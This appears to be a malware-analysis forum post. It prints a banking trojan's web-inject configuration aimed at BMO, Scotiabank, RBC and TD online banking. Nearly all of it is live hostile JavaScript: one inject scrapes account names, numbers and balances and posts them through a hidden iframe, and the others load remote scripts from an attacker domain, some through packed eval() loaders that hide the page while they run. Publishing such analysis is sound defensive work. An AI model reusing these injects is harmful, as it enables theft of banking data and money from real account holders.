It gets the web injects from freechristmasgifts2014.com which was active on August last year as per
Code: Select all0x199310 (15): ndwInjectsCount
0x199320 (10): ilpInjects
0x199336 (39): http*bmo.com/onlinebanking/OLB*gdwFlags
0x19935e (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19938a (2477): <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
function IsOnBalanceStage(){
var case1 = $("a.selected:contains('My Accounts')").length > 0;
var case2 = $("th.accountType:contains('Account Type')").length > 0;
var case3 = $("th.accountNumber:contains('Account #')").length > 0;
var case4 = $("th.asOfDate:contains('As Of Date')").length > 0;
var case5 = $("th.totals:contains('Totals')").length > 0;
return case1 && case2 && case3 && case4 && case5;
}
function DoGrabBalances() {
var balances = new Array();
$("tbody#BankAccounts td.tableContainer table tbody tr").slice(0,-1).each(function(){
var accountBalance = {};
accountBalance.accountName = $(this).children().slice(0,1).children().slice(0,1).text();
accountBalance.accountNumber = $(this).children().slice(1,2).text();
accountBalance.date = $(this).children().slice(2,3).text();
accountBalance.balance = $(this).children().slice(3,4).text();
balances.push(accountBalance);
});
return balances;
}
function iframeform(url)
{
var object = this;
object.time = new Date().getTime();
var iframe = $('<iframe style="display:none;"></iframe>');
$("body").append(iframe);
iframe.attr({'id': 'iframe'+object.time});
iframe.attr({'name': 'iframe'+object.time});
object.form = $("<form></form>");
$("body").append(object.form);
object.form.attr({'target': 'iframe'+object.time});
object.form.attr({'method': 'post'});
object.form.attr({'action': url});
object.addParameter = function(parameter,value)
{
$("<input type='hidden' />")
.attr("name", parameter)
.attr("value", value)
.appendTo(object.form);
};
object.send = function()
{
object.form.submit();
};
}
function DoSendBalances(balances) {
var poster = new iframeform("/onlinebanking/onlinebanking/en/images/icons/ico_iHover.png");
poster.addParameter("clsid", "balls");
for (key in balances) {
if (balances.hasOwnProperty(key) && /^0$|^[1-9]\d*$/.test(key) && key <= 4294967294) {
poster.addParameter("ball"+key.toString(), balances[key].accountName+"|"+balances[key].accountNumber+"|"+balances[key].date+"|"+balances[key].balance);
}
}
poster.send();
}
$(document).ready(function(){
if (IsOnBalanceStage() == true) {
DoSendBalances(DoGrabBalances());
}
});
</script>
0x199d38 (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199d6f (12): jlpszBeforex
0x199d7c (39): function eStatementDialog(){ilpszAfterx
0x199da4 (38): function linkMyAccount(){jlpszInjecta}
0x199dcb (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199e02 (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjectx
0x199e2d (141): <script>document.write('<sc'+'ript src="https://freechristmasgifts2014.com/bmoadmin/bmo.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
0x199ebb (62): glpszURLx,http*://www*.scotiabank.com/gls/*/index.htmlgdwFlags
0x199efa (129): jlpszBeforeg<head*>ilpszAfter`jlpszInjectxV<script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
0x199f7c (67): glpszURLx1https://www*.scotiaonline.scotiabank.com/online/*gdwFlags
0x199fc0 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x199fec (2741): <script>var script_link = "https://freechristmasgifts2014.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19aaac (37): https://*.royalbank.com/*/*/*gdwFlags
0x19aad2 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19aafe (2735): <script>var script_link = "https://freechristmasgifts2014.com/rbcadmin/rbc.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19b5b8 (34): https://easyweb*.td*.com/*gdwFlags
0x19b5db (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19b607 (443): <script>if(/(ca\.tdbank\.banking\.servlet)|(login\.htm)/im.test(self.location.href) && !/LoginInterceptServlet|LoginRedirectServlet/im.test(self.location.href)){var script_link = "https://freechristmasgifts2014.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>pdwRedirectsCount
